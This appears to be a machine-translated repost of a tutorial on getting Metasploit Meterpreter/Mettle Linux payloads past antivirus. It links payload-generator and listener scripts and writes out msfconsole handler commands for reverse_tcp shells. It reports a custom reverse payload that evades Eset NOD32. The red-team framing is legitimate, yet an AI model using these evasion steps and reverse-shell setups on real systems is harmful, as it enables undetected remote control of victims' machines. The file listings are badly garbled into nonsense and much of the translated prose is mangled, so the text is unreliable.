Shulou(Shulou.com)06/02 Report--

Today, I will talk to you about how to understand Metasploit Payload's exemption from killing on the Linux platform. Many people may not know much about it. In order to make you understand better, the editor has summarized the following contents for you. I hope you can get something according to this article.

At present, I think the security vendors that have done a good job in Linux antivirus are Avast,Eset and Kaspersky. Of course, the purpose of this article is not to promote a product, but to learn it as part of a red team exercise through case tests, and to understand what will be marked or passed.

So, for the test to run smoothly, I created a simple shell script generator that will generate various encoded executable Linux payloads, which we upload to the Linux virtual machine (Ubuntu 18.04 x86x64) and let the installed AV process them. The rest is something that theoretically works and bypasses AV, and we'll test some examples to verify their functionality.

I will focus on Linux x86 and x86x64 Meterpreter/Mettle payloads using various encoder combinations. The shell script generator contains variable names that can be changed to use favorite combinations and processes that automatically generate binaries.

Be sure to place the following script in the metasploit-framework path and make it executable. The generator script is located at:

Https://github.com/DoktorCranium/Linux-Meterpreter-tests/blob/master/Linux-meterpreter-tests/AV-TEST-LINUX.sh

When running the script, enter the Metasploit-framework LISTENING IP address and TCP port, for example:

In the first test scenario, we will use Eset NOD32 4.0.90 on Ubuntu 18.04 (x86x64):

Next, we will have a list of generated test payloads, and we will provide these payloads to remote machines with LinuxAV through SCP. In our tests, we generated 47 executables.

-rw-r--r-- 1 root root 1102368 Apr 23 23:44 aarch74-reverse_tcp2.elf-rw-r--r-- 1 root root 332 Apr 23 23:43 aarch74-reverse_tcp.elf-rw-r--r-- 1 root root 1030664 Apr 23 23:44 armle-reverse_tcp2.elf-rw-r--r-- 1 root root 464 Apr 23 23:44 mipsbe-reverse_tcp.elf-rw-r--r-- 1 root root 464 Apr 23 23:44 mipsle-reverse_tcp.elf-rw-r--r-- 1 root root Apr 23 23:39 x64 mipsle-reverse_tcp.elf-rw-r--r-- 1 Apr 23 23:39 x64 Apr-1 Apr 23 23:39 x64 Mustang Apr 23 23:39 x64 Mustang Apr 23 23:39 Mt Mustang-1 root root 239 Apr 23 23:39 Xor.elf-rw-r--r-- 1 root root 1046472 Apr 23 23:39 x64kuhashi root root-1 root root 249 Apr 23 23:38 x64Muyuki-1 root root 1046631 Apr 23 23:39 x64Muyama-1 root root 295 Apr 23 23:38 Rw-r--r-- 1 root root 1046472 Apr 23 23:39 x64 MFT-1 root root 1046472 Apr 23 23:40 x64 MRT-1 root root 1046631 Apr 23 23:39 MTV Mustang-1 root root 1046631 Apr 23 23:39 x64 Apr 23 x64 Mustang 1 root root 206BINDUBDUR Apr 23 23:40 x64MUR Apr 23 23:40 x64MUR Apr 23 23:40 x64FUBDUBINDFUR RWFLY-1 root root 247 RWF 23 23:40 x64FUBDUBINDUBINDUT cpMYOR 2.elfMYRWRMART-1 root root 239 Apr 23 23:40 x64FUBINDUBING tcpLYXor.ELFRORWAY RWAY- 1 root root 249 Apr 23 23:40 x64 root root RW Apr 23 23:40 x64 Mustang Apr-1 root root 295 Apr 23 23:40 x64 Mustang 122 Apr 23 23:41 x86 root root RW Mustang RWQ-1 root root 257 Apr 23 23:41 Xor.elf Mustang RW Mustang RW Mustang-1 root root 194 root root 23 23:42 x86 Mt Mustang Apr 1 root root 329 MFT 23 23:41 x 86 Mustang Mt Mustang Apr 23 23:41 x86-mt -reverse_tcp2.elf-rw-r--r-- 1 root root 207kW Apr 23 23:41 x86kuhashi-1 root root 1107790 Apr 23 23:41 x86Makeuhashi rwkashi-1 root root 342 Apr 23 23:41 x86Mt Mustang Apr 23 23:41 x86Mt Mustang Apr 23 23:41 x 86Mt Mustang _ tcp-xor.elf.multi-rw-r--r-- 1 root root 1107556 Apr 23 23:42 x86 Maxi root root-1 root root 1107556 root root 23 23:42 x86 MTV Apr 23 23:42 x86 MRT Apr 23 23:42 -rw-r--r-- 1 root root 62 Apr 23 23:43 x86 Mustang-1 root root 194 Apr 23 23:43 x86 Apr 1 root root 297 Apr 23 23:43 x86 Apr 23 23:42 x86-sh-bind_tcp-xor.elf -rw-r--r-- 1 root root 207 Apr 23 23:43 x86 root root RW Apr 23 23:43 x86 Kawakai Apr-1 root root 342 Apr 23 23:43 x86-sh-reverse-xor.elf-1 root root 342 Apr 23 23:43 x86-sh-reverse-xor.elf

Once we upload them, AV starts and automatically deletes most of the payloads.

After the execution is completed, we will see that some files have been completely preserved, some of them will not work properly, and some files will still work properly, and we will test them in the next step. We have 27 documents that have been preserved.

Because our VM is running on a 64-bit system, let's take a look at those x86 / 64 payloads.

-rw-r--r-- 1 user user 62 Apr 23 22:08 x64 Masha-1 user user 62 Apr 23 22:08 x64 Mustang exec.elflur RWFLY-1 user user 198 MFT 23 22:08 x64mtFLY-1 user user 1046631 Apr 23 22:08 x64MRT RWR RFT-1 user user RWR RFT-22 08 x64 Apr Apr: 08 x64 Muffin RW Apr 23 22:08 x64 Mt Mustang Apr 23 22:08 Mustang

We will configure our test LISTENER (place the following script in the metasploit-framework directory and make it executable).

Https://github.com/DoktorCranium/Linux-Meterpreter-tests/blob/master/Linux-meterpreter-tests/LISTENER-LINUX-METTLE.sh

(and adjust to the remote payloads of the test, that is, change line 13 accordingly)

Echo-n'. / msfconsole-x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST'> run.listener.sh

If we want to validate anything other than meterpreter/reverse_tcp, we need to modify linux/x64/meterpreter/reverse_tcp to the corresponding payload in LISTENER.

Echo-n'. / msfconsole-x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter_reverse_tcp; set LHOST'> run.listener.sh

The above applies to x64-mt-reverse_tcp-xor2.elf, because the platform is x64 and it is a meterpreter reverse tcp payload, so we will launch our listener (please note the difference between the two payload above! )

And use Eset NOD32 AV to execute payload on the test VM, and get a core-dumped message:)

Let's try other x86'64 mypreter/mettle- > x64-mt-bind_tcp.elf

This time we use linux/x64/meterpreter/bind_tcp payload and adjust the LISTENER again. This time we have to add a remote IP for bind_tcp to work (even so), but we still have to test it, and this time it works.

However, we want a reverse meterpreter/mettle payload that can bypass Eset NOD32 and work properly!

Let's try more custom code:

Https://github.com/DoktorCranium/Linux-Meterpreter-tests/blob/master/Linux-meterpreter-tests/LINUX-FORK-METTLE.sh

Use Nod32 to upload linux-payload to VM and run listener.

Execute linux-payload and... We successfully bypassed AV:) using a custom reverse mettle payload

I mentioned earlier that you can do the same for Windows PE32. Isn't it? :) now you know that it works the same way as on Windows, and you can fully automate AV evasion testing through the above scripts, scp, etc.

After reading the above, do you have any further understanding of how to understand Metasploit Payload's immunity from killing on the Linux platform? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.